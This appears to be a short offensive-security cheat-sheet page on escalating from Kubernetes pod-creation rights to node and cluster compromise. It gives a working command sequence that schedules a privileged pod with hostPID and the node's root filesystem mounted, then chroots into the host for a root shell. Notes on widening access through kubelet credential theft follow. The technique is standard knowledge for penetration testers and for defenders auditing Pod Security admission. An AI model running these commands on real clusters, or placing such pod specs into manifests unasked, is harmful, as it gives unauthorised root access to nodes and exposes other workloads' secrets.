Pod creation to node

The right to create pods is one of the most powerful permissions in Kubernetes, because a pod spec can request a host mount, the privileged flag, or host namespaces. Scheduling such a pod lands code on a node as root, where the kubelet credentials and other pods' secrets lead to the whole cluster.

bash
kubectl auth can-i create pods
# Schedule a pod that mounts the node root filesystem
kubectl run pwn --image=alpine --overrides='{"spec":{"hostPID":true,"containers":[{"name":"c","image":"alpine","securityContext":{"privileged":true},"volumeMounts":[{"name":"h","mountPath":"/host"}],"command":["sleep","1d"]}],"volumes":[{"name":"h","hostPath":{"path":"/"}}]}}'
kubectl exec -it pwn -- chroot /host sh

Exploitation notes#

  • create pods plus a permissive or absent Pod Security admission is node compromise; the pod requests the dangerous configuration directly.
  • Even namespaced pod-creation reaches the node it schedules onto, then Kubelet credential theft widens it to the cluster.
  • The breakout inside the pod uses Privileged configuration; admission controls are the only thing standing in the way, so check them first.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more